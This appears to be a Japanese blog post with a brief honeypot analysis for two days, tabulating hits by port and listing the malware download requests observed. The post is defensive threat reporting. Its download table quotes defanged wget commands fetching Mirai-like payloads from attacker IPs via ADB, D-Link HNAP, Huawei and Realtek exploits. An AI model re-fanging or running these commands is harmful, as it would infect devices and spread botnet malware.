ハニーポット簡易分析(21,22日目:8/28,8/29)
遅れましたが、Honeypotの簡易分析 8/28,8/29分の更新となります。
8/28
Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 1,954 | 57.17% | SMB |
3389 | 69 | 2.02% | RDP |
1433 | 62 | 1.81% | Microsoft SQL Server |
3128 | 52 | 1.52% | ? |
8080 | 46 | 1.35% | PROXY |
52869 | 45 | 1.32% | D-Link, Realtek SDK |
81 | 37 | 1.08% | ? |
8443 | 35 | 1.02% | ? |
5555 | 32 | 0.94% | Android Debug Bridge |
4500 | 32 | 0.94% | IPSec NAT Traversal |
8/29
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 2,057 | 57.14% | SMB |
3389 | 151 | 4.19% | RDP |
8080 | 70 | 1.94% | PROXY |
1433 | 68 | 1.89% | Microsoft SQL Server |
9600 | 62 | 1.72% | ? |
52869 | 46 | 1.28% | D-Link, Realtek SDK |
5555 | 37 | 1.03% | Android Debug Bridge |
1471 | 32 | 0.89% | ? |
81 | 24 | 0.67% | ? |
22 | 22 | 0.61% | SSH |
<マルウェアダウンロード>
宛先ポート | リクエスト | ダウンロード | 脆弱性 |
5555 | wget hxxp://207[.]148[.]78[.]152/br VirusTotal |
Android Debug Bridge に対する攻撃 | |
wget hxxp://185[.]162[.]130[.]187/adbs VirusTotal |
|||
wget hxxp://27[.]102[.]115[.]44/adbs VirusTotal |
|||
8081 | POST /HNAP1/ | wget hxxp://148[.]72[.]176[.]78/ngynx VirusTotal |
D-Link 社のルータへの攻撃(CVE-2015-2051) |
wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip VirusTotal |
|||
wget hxxp://148[.]72[.]176[.]78/ken[.]sh | |||
37215 | POST /ctrlt/DeviceUpgrade_1 | wget -g 209[.]141[.]33[.]86 VirusTotal |
Huawei社のルータを狙った攻撃 |
wget -g 31[.]220[.]43[.]190 | |||
52869 | POST /picdesc[.]xml | wget hxxp://185[.]10[.]68[.]127/rtbin | Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃 |
wget hxxp://80[.]211[.]112[.]150/mips | |||
wget hxxp://80[.]211[.]137[.]127/ntpd | |||
wget hxxp://159[.]65[.]232[.]56/xd[.]mips | |||
wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG | |||
wget hxxp://107[.]191[.]99[.]41/elf[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip | |||
wget hxxp://185[.]10[.]68[.]127/rtbin VirusTotal |
他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。
以上、簡易分析でした。